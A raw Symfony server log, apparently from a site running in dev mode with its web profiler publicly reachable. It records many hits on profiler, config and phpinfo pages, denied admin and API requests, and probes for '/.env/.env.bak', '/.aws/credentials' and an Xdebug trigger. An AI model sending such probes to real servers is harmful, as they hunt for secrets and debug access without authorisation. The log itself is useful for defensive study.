[2025-12-19 07:40:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1e0bba","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/1e0bba?panel=config","method":"GET"} []
[2025-12-19 07:40:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-19 07:40:48] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
[2025-12-19 07:42:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d55aca","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/d55aca?panel=config","method":"GET"} []
[2025-12-19 07:42:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-19 07:42:59] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-19 07:44:06] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"417fde","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/417fde?panel=dump","method":"GET"} []
[2025-12-19 07:44:06] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
[2025-12-19 07:47:36] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-19 07:51:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d55aca","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/d55aca?panel=cache","method":"GET"} []
[2025-12-19 07:51:47] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-19 07:56:04] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-19 08:00:11] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"4e9618","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/4e9618?panel=time","method":"GET"} []
[2025-12-19 08:00:11] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-19 08:01:02] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?panel=dump","method":"GET"} []
[2025-12-19 08:01:02] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
[2025-12-19 08:01:15] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7300e2","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/7300e2?panel=security","method":"GET"} []
[2025-12-19 08:01:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-19 08:03:10] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5e3cf1","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/5e3cf1?panel=cache","method":"GET"} []
[2025-12-19 08:03:10] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-19 08:05:31] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://admin.unda.co/_profiler/phpinfo","method":"GET"} []
[2025-12-19 08:05:31] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-19 08:05:31] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-19 08:05:31] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-19 08:05:31] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-19 08:05:31] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-19 08:05:31] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-19 08:05:32] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"POST"} []
[2025-12-19 08:05:32] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-19 08:05:32] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-19 08:05:32] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-19 08:05:32] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-19 08:05:32] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-19 08:05:32] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-19 08:05:33] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"POST"} []
[2025-12-19 08:05:33] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-19 08:05:33] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-19 08:05:33] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-19 08:05:33] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-19 08:05:33] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-19 08:05:33] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-19 08:08:27] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=146.19.24.116&limit=10&method=GET","method":"GET"} []
[2025-12-19 08:08:27] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=146.19.24.116&limit=10&method=GET","method":"GET"} []
[2025-12-19 08:10:00] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d55aca","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/d55aca","method":"GET"} []
[2025-12-19 08:10:00] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-19 08:13:30] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-19 08:13:30] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-19 08:15:24] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
[2025-12-19 08:15:24] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-19 08:15:24] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-19 08:15:24] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-19 08:15:24] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-19 08:15:24] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-19 08:15:24] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-19 08:15:24] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
[2025-12-19 08:18:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 08:19:08] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c61e5e","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/c61e5e?panel=request","method":"GET"} []
[2025-12-19 08:19:08] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-19 08:19:15] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7300e2","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/7300e2","method":"GET"} []
[2025-12-19 08:19:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-19 08:20:10] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f0043c","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/f0043c?panel=request","method":"GET"} []
[2025-12-19 08:20:10] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-19 08:21:56] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
[2025-12-19 08:22:52] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://api.unda.co/_profiler/phpinfo","method":"GET"} []
[2025-12-19 08:22:52] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-19 08:22:52] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-19 08:22:52] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-19 08:22:52] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-19 08:22:52] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-19 08:22:52] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-19 08:22:53] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"POST"} []
[2025-12-19 08:22:53] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-19 08:22:53] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-19 08:22:53] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-19 08:22:53] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-19 08:22:53] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-19 08:22:53] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-19 08:22:54] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"POST"} []
[2025-12-19 08:22:54] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-19 08:22:54] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-19 08:22:54] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-19 08:22:54] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-19 08:22:54] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-19 08:22:54] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-19 08:27:53] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7d563a","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7d563a?panel=security","method":"GET"} []
[2025-12-19 08:27:53] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-19 08:31:48] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-19 08:31:49] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-19 08:32:30] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=47.242.70.104&limit=10","method":"GET"} []
[2025-12-19 08:32:30] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=47.242.70.104&limit=10","method":"GET"} []
[2025-12-19 08:32:35] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://auth.unda.co/_profiler/phpinfo","method":"GET"} []
[2025-12-19 08:36:50] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3d0bc2","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/3d0bc2?panel=twig","method":"GET"} []
[2025-12-19 08:36:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-19 08:39:49] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=44.192.15.107&limit=10","method":"GET"} []
[2025-12-19 08:39:49] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=44.192.15.107&limit=10","method":"GET"} []
[2025-12-19 08:43:02] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=199.45.154.156&limit=10","method":"GET"} []
[2025-12-19 08:43:02] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=199.45.154.156&limit=10","method":"GET"} []
[2025-12-19 08:45:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3d0bc2","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/3d0bc2?panel=time","method":"GET"} []
[2025-12-19 08:45:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-19 08:46:15] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-19 08:46:41] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://unda.co/_profiler/phpinfo","method":"GET"} []
[2025-12-19 08:46:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env/.env.bak"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env/.env.bak\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 08:46:48] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-19 08:46:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.aws/credentials"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.aws/credentials\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 08:48:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 08:49:43] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
[2025-12-19 08:50:28] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
[2025-12-19 08:50:29] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"6f8fb1","_route":"_wdt"},"request_uri":"https://auth.unda.co/_wdt/6f8fb1","method":"GET"} []
[2025-12-19 08:51:16] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-19 08:51:17] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
[2025-12-19 08:51:17] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-19 08:51:17] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-19 08:51:17] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-19 08:51:17] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-19 08:51:17] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-19 08:51:17] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-19 08:51:18] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
[2025-12-19 08:52:22] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/?XDEBUG_SESSION_START=phpstorm","method":"GET"} []
[2025-12-19 08:53:41] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3d0bc2","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/3d0bc2?panel=security","method":"GET"} []
[2025-12-19 08:53:41] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-19 08:54:42] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=35.198.60.231&limit=10","method":"GET"} []
[2025-12-19 08:54:42] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=35.198.60.231&limit=10","method":"GET"} []
[2025-12-19 08:55:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"4e9618","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/4e9618","method":"GET"} []
[2025-12-19 08:55:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-19 08:56:33] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
[2025-12-19 09:00:28] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"418d56","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/418d56?panel=exception","method":"GET"} []
[2025-12-19 09:00:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
